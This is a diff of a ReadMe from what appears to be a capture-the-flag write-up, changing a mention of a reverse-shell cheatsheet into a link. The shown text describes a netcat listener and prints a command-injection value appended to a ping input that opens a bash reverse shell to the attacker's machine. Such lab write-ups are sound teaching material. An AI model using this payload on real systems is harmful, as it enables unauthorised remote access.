RazTheGoon/Kingdom1/ReadMe.md

 ![S](Images/Localpwd.png)

 From here it was just a matter of making this machine (target) call back to my (attacker) machine.
-As always I set up a netcat listener on my (attacker) machine using the command `nc -lvnp 4444` and then I went over to pentestmonkey.net 's reverse shell cheatsheet where I got the bash reverse shell.
+As always I set up a netcat listener on my (attacker) machine using the command `nc -lvnp 4444` and then I went over to [pentest monkey's](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) reverse shell cheatsheet where I got the bash reverse shell.

 When appended to the end of the localhost ping, the final command looked like this:
 `127.0.0.1;bash -i >& /dev/tcp/10.0.0.0/4444 0>&1`